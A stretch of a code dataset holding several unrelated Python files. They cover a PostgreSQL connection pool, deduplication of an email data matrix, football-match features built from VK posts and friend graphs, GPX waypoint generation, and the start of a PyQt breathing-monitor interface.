'postgresql+psycopg2://',\n creator=lambda: Pool.connection(db_name)\n )\n\n @staticmethod\n def close(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n \"\"\"\n Pool.connection(db_name).close()\n\n @staticmethod\n def cursor(db_name: str='default'):\n # open database connect\n \"\"\"\n\n :param db_name:\n :return:\n \"\"\"\n cur = Pool.connection(db_name).cursor()\n dbconf = Pool._settings[db_name]\n \n if 'SCHEMA' in dbconf:\n Pool.execute(cur, 'SET search_path TO ' + dbconf['SCHEMA'])\n return cur\n \n @staticmethod\n def cursor_pool(db_name: str='default'):\n \"\"\"\n\n :param db_name:\n :return:\n \"\"\"\n if Pool._cursor:\n return Pool._cursor\n \n Pool._cursor = Pool.connection(db_name).cursor()\n dbconf = Pool._settings[db_name]\n\n if 'SCHEMA' in dbconf:\n Pool.execute(\n Pool._cursor, \n 'SET search_path TO ' + dbconf['SCHEMA']\n )\n return Pool._cursor\n\n @staticmethod\n def create_database(database_settings: dict, database_name: str):\n \"\"\"\n\n\n :param database_settings:\n :param database_name:\n \"\"\"\n _conn_string = (\n ('host=%(HOST)s dbname=%(NAME)s user=%(USER)s ' +\n 'password=%(PASSWORD)s') % database_settings\n )\n\n conn = psycopg2.connect(dsn=_conn_string)\n conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)\n\n cur = conn.cursor()\n dbconf = Pool._settings[database_name]\n\n if 'SCHEMA' in dbconf:\n Pool.execute(cur, 'SET search_path TO ' + dbconf['SCHEMA'])\n return cur\n\n @staticmethod\n def execute(cursor, statement, arg=()):\n \"\"\"\n\n \"\"\"\n if Pool.debug():\n try:\n log.append(statement % arg)\n except:\n pass\n\n cursor.execute(statement, arg)\n","sub_path":"labtrans/db/conn.py","file_name":"conn.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"415650686","text":"\"\"\"\nMore Preprocessing to make A non-singular (deleting duplicate emails)\n\"\"\"\nfrom scipy import linalg\nimport numpy as np\n\nprint(\"Loading y\")\ny = np.loadtxt('labels.csv')\nprint(\"Loading A\")\nA = np.loadtxt('DataMatrix.csv',delimiter=\",\",usecols=range(45849))\nprint(\"Phase 1\")\nrows,cols = np.shape(A)\ncounter = 0\nindeces = []\nfor i in range(rows):\n indeces.append(counter)\n counter +=1 \ndeletes = []\nprint(\"Phase 2\")\nfor i in range(rows):\n print(i)\n for j in indeces:\n if np.array_equiv(A[i,:],A[j,:]) and i != j:\n deletes.append(j)\n #A = np.delete(A,(j),axis=0)\n #y = np.delete(y, (j),axis = 0)\n indeces.pop(0)\nprint(deletes)\nprint(\"Phase 3\")\n\ndeletes = np.unique(deletes)[::-1]\nprint(deletes)\nfor index in deletes:\n print(index)\n A = np.delete(A,(index),axis=0)\n y = np.delete(y, (index),axis = 0)\n\nprint(\"starting to write\")\nwith open(\"ReducedData.csv\",'w') as d:\n for row in A:\n for datum in row:\n d.write(str(datum) + \",\")\n d.write('\\n')\nwith open(\"ReducedLabels.csv\",'w') as l:\n for datum in y:\n l.write(str(datum))\n l.write('\\n')\n\n\"\"\"\nprint(\"Starting the inverse... :/\")\nw_hat = A.T@linalg.inv(A@A.T)@y\n\n\n#for i in w_hat:\n #print(i)\nwith open(\"weights.csv\",'w') as w:\n for weight in w_hat:\n w.write(str(weight))\n w.write(\"\\n\")\n\n\"\"\"\n","sub_path":"Erase Duplicates.py","file_name":"Erase Duplicates.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"195729777","text":"from pymongo import MongoClient\nimport pandas as pd\nimport datetime\nimport time\nimport networkx as nx\nimport numpy as np\nfrom ast import literal_eval\n\n\nHOUR = 3600\nCLUBS_TRANSLIT = {'Анжи':'anji', 'Амкар': 'amkar', 'Арсенал':'arsenal', 'Волга': 'volga', 'Динамо': 'dinamo', 'Зенит': 'zenit',\n 'Краснодар': 'krasnodar', 'Крылья Советов': 'krylya', 'Кубань': 'kuban', 'Локомотив': 'loko',\n 'Мордовия': 'mordovia', 'Ростов': 'rostov', 'Рубин': 'rubin', 'Спартак': 'spartak', 'Терек': 'terek',\n 'Томь': 'tom', 'Торпедо': 'torpedo', 'Урал': 'ural', 'Уфа': 'ufa', 'ЦСКА': 'cska'}\n\n\ndef get_datetime_from_str(date_str, time_str):\n return datetime.datetime.strptime(date_str+time_str, '%d.%m.%Y%H:%M')\n\n\ndef get_unixtime_from_datetime(input_datetime):\n return int(time.mktime(input_datetime.timetuple()))\n\n\ndef main():\n client = MongoClient()\n games_db = client['rfpl_games']\n posts_db = client['rfpl_vk_posts']\n users_db = client['rfpl_vk_users']\n\n # get all games info dataframe\n df_list = []\n for collection_name in games_db.collection_names(include_system_collections=False):\n collection = games_db[collection_name]\n df_list.append(pd.DataFrame(list(collection.find())))\n games_df = pd.concat(df_list, ignore_index=True)\n\n features_df = pd.DataFrame()\n\n for games_counter in range(len(games_df)):\n # markup\n home_team_violations = literal_eval(games_df.get_value(games_counter, 'home_team_violations'))\n guest_team_violations = literal_eval(games_df.get_value(games_counter, 'guest_team_violations'))\n violations = home_team_violations + guest_team_violations\n violations = [int(x) for x in violations]\n\n if 112 in violations:\n features_df.set_value(games_counter, 'chanting', 1)\n else:\n features_df.set_value(games_counter, 'chanting', 0)\n\n if 113 in violations:\n features_df.set_value(games_counter, 'throwing', 1)\n else:\n features_df.set_value(games_counter, 'throwing', 0)\n\n if 114 in violations:\n features_df.set_value(games_counter, 'pyro', 1)\n else:\n features_df.set_value(games_counter, 'pyro', 0)\n\n if 115 in violations:\n features_df.set_value(games_counter, 'fight', 1)\n else:\n features_df.set_value(games_counter, 'fight', 0)\n\n if 116 in violations:\n features_df.set_value(games_counter, 'banner', 1)\n else:\n features_df.set_value(games_counter, 'banner', 0)\n\n if 117 in violations:\n features_df.set_value(games_counter, 'others', 1)\n else:\n features_df.set_value(games_counter, 'others', 0)\n\n home_team = games_df.get_value(games_counter, 'home_team')\n match_date = games_df.get_value(games_counter, 'date')\n match_time = games_df.get_value(games_counter, 'time')\n end_time = get_unixtime_from_datetime(get_datetime_from_str(match_date, match_time)) + HOUR*2\n\n posts_collection = posts_db[CLUBS_TRANSLIT[home_team] + '_' + match_date]\n\n # posts number\n posts_number = posts_collection.count({'date': {'$lt': end_time}})\n\n if posts_number > 30:\n\n posts_df = pd.DataFrame(list(posts_collection.find({'date': {'$lt': end_time}})))\n text_lengths = []\n likes_numbers = []\n reposts_numbers = []\n anger = []\n contempt = []\n disgust = []\n fear = []\n happiness = []\n neutral = []\n sadness = []\n surprise = []\n\n for i in range(len(posts_df)):\n post_text = posts_df.get_value(i, 'text')\n text_lengths.append(len(post_text))\n\n post_likes = posts_df.get_value(i, 'likes')\n likes_numbers.append(post_likes['count'])\n\n post_reposts = posts_df.get_value(i, 'reposts')\n reposts_numbers.append(post_reposts['count'])\n\n features_df.set_value(games_counter, 'mean_text_length', np.mean(text_lengths))\n features_df.set_value(games_counter, 'mean_likes_number', np.mean(likes_numbers))\n features_df.set_value(games_counter, 'mean_reposts_number', np.mean(reposts_numbers))\n\n try:\n emotions_sets = posts_df[posts_df['emotions_set'].notnull()]['emotions_set'].get_values()\n except Exception:\n pass\n else:\n if len(emotions_sets) > 0:\n for each_emotions_sets_list in emotions_sets:\n for each_emotions_set in each_emotions_sets_list:\n anger.append(each_emotions_set['anger'])\n contempt.append(each_emotions_set['contempt'])\n disgust.append(each_emotions_set['disgust'])\n fear.append(each_emotions_set['fear'])\n happiness.append(each_emotions_set['happiness'])\n neutral.append(each_emotions_set['neutral'])\n sadness.append(each_emotions_set['sadness'])\n surprise.append(each_emotions_set['surprise'])\n\n features_df.set_value(games_counter, 'anger_median', np.median(anger))\n features_df.set_value(games_counter, 'contempt_median', np.median(contempt))\n features_df.set_value(games_counter, 'disgust_median', np.median(disgust))\n features_df.set_value(games_counter, 'fear_median', np.median(fear))\n features_df.set_value(games_counter, 'happiness_median', np.median(happiness))\n features_df.set_value(games_counter, 'neutral_median', np.median(neutral))\n features_df.set_value(games_counter, 'sadness_median', np.median(sadness))\n features_df.set_value(games_counter, 'surprise_median', np.median(surprise))\n\n users_collection = users_db[CLUBS_TRANSLIT[home_team] + '_' + match_date]\n\n visitors_ids = []\n all_visitors_friends = {}\n all_visitors_communties = {}\n\n mutual_friends_graph = nx.Graph()\n friends_among_visitors_graph = nx.Graph()\n mutual_communities_graph = nx.Graph()\n\n # graphs density\n cursor = users_collection.find()\n while cursor.alive:\n try:\n doc = cursor.next()\n except Exception:\n pass\n else:\n visitors_ids.append(doc['user_id'])\n all_visitors_friends[doc['user_id']] = doc['friends_ids']\n all_visitors_communties[doc['user_id']] = doc['communities_ids']\n\n mutual_friends_graph.add_nodes_from(visitors_ids)\n friends_among_visitors_graph.add_nodes_from(visitors_ids)\n mutual_communities_graph.add_nodes_from(visitors_ids)\n\n nodes_weights = {}\n processed_visitors = []\n\n for visitor_id in visitors_ids:\n processed_visitors.append(visitor_id)\n current_user_friends = set(all_visitors_friends[visitor_id])\n current_user_communities = set(all_visitors_communties[visitor_id])\n nodes_weights[visitor_id] = len(current_user_friends)\n other_visitors = set([x for x in visitors_ids if x not in processed_visitors])\n current_user_friends_among_visitors = list(current_user_friends & other_visitors)\n if len(current_user_friends_among_visitors) != 0:\n for each_friend_id in current_user_friends_among_visitors:\n friends_among_visitors_graph.add_edge(visitor_id, each_friend_id)\n\n for each_other_visitor in other_visitors:\n other_visitor_communities = set(all_visitors_communties[each_other_visitor])\n mutual_communities = list(current_user_communities & other_visitor_communities)\n mutual_communities_length = len(mutual_communities)\n if mutual_communities_length > 0:\n mutual_communities_graph.add_edge(visitor_id, each_other_visitor,\n weight=mutual_communities_length)\n\n other_visitor_friends = set(all_visitors_friends[each_other_visitor])\n mutual_friends = list(current_user_friends & other_visitor_friends)\n mutual_friends_length = len(mutual_friends)\n if mutual_friends_length > 0:\n mutual_friends_graph.add_edge(visitor_id, each_other_visitor, weight=mutual_friends_length)\n\n nx.set_node_attributes(mutual_friends_graph, 'weight', nodes_weights)\n\n features_df.set_value(games_counter, 'mutual_friends_graph_density', nx.density(mutual_friends_graph))\n features_df.set_value(games_counter, 'mutual_communities_graph_density',\n nx.density(mutual_communities_graph))\n features_df.set_value(games_counter, 'friends_among_visitors_graph_density',\n nx.density(friends_among_visitors_graph))\n\n features_df = features_df.dropna(axis=0).reset_index(drop=True)\n print(features_df.columns)\n input()\n features_df.to_csv('/media/vasiliy/01D266BF62940460/Linux/football_research/output_data/online_features.csv', sep=';')\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"Features/PrepareOnlineFeaturesTable.py","file_name":"PrepareOnlineFeaturesTable.py","file_ext":"py","file_size_in_byte":9719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168944926","text":"import datetime\n\ndef calDis(cor1, cor2):\n dis = (cor1[0]-cor2[0])**2 + (cor1[1]-cor2[1])**2\n return dis\n\nif __name__=='__main__':\n corList = set()\n inFile = open('ttt')\n outFile = open('my.gpx','w')\n outFile2 = open('trkpt.gpx','w')\n outFile3 = open('gen.gpx','w')\n outFile.write('\\n\\n')\n idx = 1\n curLat = 0\n curLon = 0\n for lines in inFile:\n tmp = lines.strip().split(',')\n lat = float(tmp[0])\n lon = float(tmp[1])\n if idx == 1:\n curLat = lat\n curLon = lon\n idx = 0\n else:\n corList.add((lat, lon))\n inFile.close()\n\n idx = 1\n now = datetime.datetime.now()\n while len(corList) >= 1:\n minDis = float('inf')\n for cor in corList:\n dis = calDis((curLat, curLon), cor)\n if dis < minDis:\n targetCor = cor\n minDis = dis\n curLat = targetCor[0]\n curLon = targetCor[1]\n corList.remove((targetCor))\n outFile.write('\\n\\tWP%03d\\n\\t\\n\\n' %(curLat, curLon, idx, now.strftime('%Y-%m-%dT%H:%M:%SZ')) )\n outFile2.write('\\n' % (curLat, curLon) )\n idx+=1\n delta = minDis*10000000\n outFile3.write('gps setlatitude %s\\ngps setlongitude %s\\ngps setaltitude 0\\ngps setbearing 0\\npause %d\\n' % (curLat, curLon, delta))\n if delta < 1:\n delta = 1\n now = now + datetime.timedelta(seconds=delta)\n outFile.write('')\n outFile.close()\n outFile2.close()\n outFile3.close()\n\n","sub_path":"dis.py","file_name":"dis.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"37578162","text":"from PyQt5 import Qt, QtCore, QtGui, QtWidgets\r\nfrom pyqtgraph import PlotWidget, plot\r\nimport pyqtgraph as pg\r\nimport sys\r\nimport os\r\nimport serial\r\nfrom serial import SerialException\r\nimport time\r\nfrom random import randint\r\nfrom PyQt5.Qt import QColor, QDate, QTime\r\nfrom functools import partial\r\nimport datetime\r\nfrom statistics import mean\r\nimport csv\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n \r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(2629, 1262)\r\n\r\n self.setupSerial()\r\n self.setupDataAcq()\r\n self.setupPalette(MainWindow)\r\n\r\n self.centralWidget = QtWidgets.QWidget(MainWindow)\r\n self.centralWidget.setObjectName(\"centralWidget\")\r\n self.centralWidget_VL = QtWidgets.QVBoxLayout(\r\n self.centralWidget)\r\n self.centralWidget_VL.setObjectName(\"centralWidget_VL\")\r\n\r\n self.setupStats()\r\n self.setupGraph1()\r\n self.setupGraph2()\r\n self.setupGraph3()\r\n self.setupDataTimer()\r\n self.setupBreathingTimer()\r\n self.setupClockRecordingTimer()\r\n\r\n MainWindow.setCentralWidget(self.centralWidget)\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 2629, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n MainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n ### SETUP UI SUBMETHODS ###\r\n\r\n def setupPalette(self, MainWindow):\r\n\r\n palette = QtGui.QPalette()\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.WindowText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(31, 142, 250))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Button, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Text, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.ButtonText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Base, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.Window, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Active,\r\n QtGui.QPalette.PlaceholderText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.WindowText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(31, 142, 250))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Button, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Text, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.ButtonText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Base, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.Window, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255, 128))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Inactive,\r\n QtGui.QPalette.PlaceholderText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.WindowText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(31, 142, 250))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Button, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Text, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.ButtonText, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Base, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(22, 34, 60))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.Window, brush)\r\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))\r\n brush.setStyle(QtCore.Qt.SolidPattern)\r\n palette.setBrush(QtGui.QPalette.Disabled,\r\n QtGui.QPalette.PlaceholderText, brush)\r\n MainWindow.setPalette(palette)\r\n\r\n def setupStats(self):\r\n self.stat_widget = QtWidgets.QWidget(self.centralWidget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_widget.sizePolicy().hasHeightForWidth())\r\n self.stat_widget.setSizePolicy(sizePolicy)\r\n self.stat_widget.setObjectName(\"stat_widget\")\r\n self.stat_widget_HL = QtWidgets.QHBoxLayout(self.stat_widget)\r\n self.stat_widget_HL.setObjectName(\"stat_widget_HL\")\r\n spacerItem = QtWidgets.QSpacerItem(\r\n 40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_widget_HL.addItem(spacerItem)\r\n \r\n # self.stat_window = QtWidgets.QWidget(self.stat_widget)\r\n # self.stat_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n # \"color: rgb(255, 255, 255);\\n\"\r\n # \"border-radius: 16px;\")\r\n # self.stat_window.setObjectName(\"stat_window\")\r\n # self.stat_window_HL = QtWidgets.QHBoxLayout(self.stat_window)\r\n # self.stat_window_HL.setObjectName(\"stat_window_HL\")\r\n \r\n self.stat_window = QtWidgets.QWidget(self.stat_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_window.sizePolicy().hasHeightForWidth())\r\n self.stat_window.setSizePolicy(sizePolicy)\r\n self.stat_window.setMinimumSize(QtCore.QSize(1200, 0))\r\n self.stat_window.setMaximumSize(QtCore.QSize(1200, 16777215))\r\n self.stat_window.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.stat_window.setObjectName(\"stat_window\")\r\n self.stat_window_HL = QtWidgets.QHBoxLayout(self.stat_window)\r\n self.stat_window_HL.setObjectName(\"stat_window_HL\")\r\n spacerItem1 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem1)\r\n \r\n self.stat_col0 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col0.sizePolicy().hasHeightForWidth())\r\n self.stat_col0.setSizePolicy(sizePolicy)\r\n self.stat_col0.setObjectName(\"stat_col0\")\r\n self.stat_col0_VL = QtWidgets.QVBoxLayout(self.stat_col0)\r\n self.stat_col0_VL.setObjectName(\"stat_col0_VL\")\r\n self.ITV_value = QtWidgets.QLabel(self.stat_col0)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ITV_value.sizePolicy().hasHeightForWidth())\r\n self.ITV_value.setSizePolicy(sizePolicy)\r\n self.ITV_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ITV_value.setFont(font)\r\n self.ITV_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ITV_value.setObjectName(\"ITV_value\")\r\n self.stat_col0_VL.addWidget(self.ITV_value)\r\n self.ITV_label = QtWidgets.QLabel(self.stat_col0)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.ITV_label.sizePolicy().hasHeightForWidth())\r\n self.ITV_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.ITV_label.setFont(font)\r\n self.ITV_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.ITV_label.setObjectName(\"ITV_label\")\r\n self.stat_col0_VL.addWidget(self.ITV_label)\r\n self.stat_col0_sub = QtWidgets.QWidget(self.stat_col0)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col0_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col0_sub.setSizePolicy(sizePolicy)\r\n self.stat_col0_sub.setObjectName(\"stat_col0_sub\")\r\n self.stat_col0_sub_GL = QtWidgets.QGridLayout(self.stat_col0_sub)\r\n self.stat_col0_sub_GL.setObjectName(\"stat_col0_sub_GL\")\r\n self.E2I_button_pos = QtWidgets.QPushButton(self.stat_col0_sub)\r\n self.E2I_button_pos.setEnabled(True)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_button_pos.sizePolicy().hasHeightForWidth())\r\n self.E2I_button_pos.setSizePolicy(sizePolicy)\r\n self.E2I_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\\n\"\r\n \"\")\r\n self.E2I_button_pos.setObjectName(\"E2I_button_pos\")\r\n self.E2I_button_pos.clicked.connect(\r\n partial(self.E2I_button_clicked, True))\r\n\r\n self.stat_col0_sub_GL.addWidget(self.E2I_button_pos, 0, 2, 1, 1)\r\n self.E2I_label = QtWidgets.QLabel(self.stat_col0_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_label.sizePolicy().hasHeightForWidth())\r\n self.E2I_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.E2I_label.setFont(font)\r\n self.E2I_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.E2I_label.setObjectName(\"E2I_label\")\r\n self.stat_col0_sub_GL.addWidget(self.E2I_label, 1, 0, 1, 3)\r\n self.E2I_value = QtWidgets.QLabel(self.stat_col0_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_value.sizePolicy().hasHeightForWidth())\r\n self.E2I_value.setSizePolicy(sizePolicy)\r\n self.E2I_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.E2I_value.setFont(font)\r\n self.E2I_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.E2I_value.setObjectName(\"E2I_value\")\r\n self.stat_col0_sub_GL.addWidget(self.E2I_value, 0, 1, 1, 1)\r\n self.E2I_button_neg = QtWidgets.QPushButton(self.stat_col0_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.E2I_button_neg.sizePolicy().hasHeightForWidth())\r\n self.E2I_button_neg.setSizePolicy(sizePolicy)\r\n self.E2I_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.E2I_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.E2I_button_neg.setObjectName(\"E2I_button_neg\")\r\n self.E2I_button_neg.clicked.connect(\r\n partial(self.E2I_button_clicked, False))\r\n self.stat_col0_sub_GL.addWidget(self.E2I_button_neg, 0, 0, 1, 1)\r\n self.stat_col0_VL.addWidget(self.stat_col0_sub)\r\n self.stat_window_HL.addWidget(self.stat_col0)\r\n spacerItem2 = QtWidgets.QSpacerItem(\r\n 12, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem2)\r\n self.stat_col1 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col1.sizePolicy().hasHeightForWidth())\r\n self.stat_col1.setSizePolicy(sizePolicy)\r\n self.stat_col1.setObjectName(\"stat_col1\")\r\n self.stat_col1_VL = QtWidgets.QVBoxLayout(self.stat_col1)\r\n self.stat_col1_VL.setObjectName(\"stat_col1_VL\")\r\n self.ETV_value = QtWidgets.QLabel(self.stat_col1)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n 